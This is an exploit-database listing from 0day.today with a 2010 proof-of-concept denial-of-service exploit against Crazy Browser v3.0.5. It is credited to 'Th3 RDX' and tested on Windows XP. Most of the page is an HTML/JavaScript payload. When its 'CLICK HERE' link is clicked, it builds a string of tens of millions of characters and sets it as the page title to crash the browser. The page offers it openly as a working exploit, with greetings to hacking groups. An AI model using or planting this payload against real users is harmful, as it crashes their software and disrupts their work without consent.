[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Crazy Browser v3.0.5 Remote Denial of Service Exploit

Author
Th3 RDX
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12742
Category
dos / poc
Date add
17-06-2010
Platform
windows
=====================================================
Crazy Browser v3.0.5 Remote Denial of Service Exploit
=====================================================


# Exploit Title: Crazy Browser v3.0.5 Remote Denial of Service Exploit
# Date: 17-06-2010
# Author: Th3 RDX
# Software Link: http://www.crazybrowser.com/cbsetup.exe
# Version: 3.0.5
# Tested on: Windows-XP-SP3
# category: Windows
# Code :

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Lucky(www.indishell.in)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


##############################################################################
%//

----- [ Founder ] -----

    Th3 RDX

----- [ E - mail ] -----

 th3rdx@gmail.com


                                                        %\\
##############################################################################

##############################################################################
%//

----- [Title] ----

Crazy Browser v3.0.5 Remote Denial of Service Exploit

----- [ Vendor ] -----

http://www.crazybrowser.com/

----- [ Tested On ] -----

Windows XP Service Pack 1/2/3

                                                        %\\
##############################################################################

##############################################################################
%//

----- [ c0de ] -----

<html>
<head>
<title>Crazy Browser v3.0.5 Remote Denial of Service Exploit | By: Th3
RDX</title>
<body bgcolor="black">

<script type="text/javascript">
function RDX() {
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 5000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body>
<center>
<h1>
<strong>
<font color="white">
| Crazy Browser v3.0.5 Remote Denial of Service Exploit |
<br><br><br>
 By: Th3 RDX
</font>
</strong>
</h1>
<br><h3>==> <a href="javascript:RDX();">CLICK HERE</a></font> <==</h3>
</body>
</html>


                                                        %\\
##############################################################################


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 17 June 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
End###



#  0day.today [2024-09-21]  #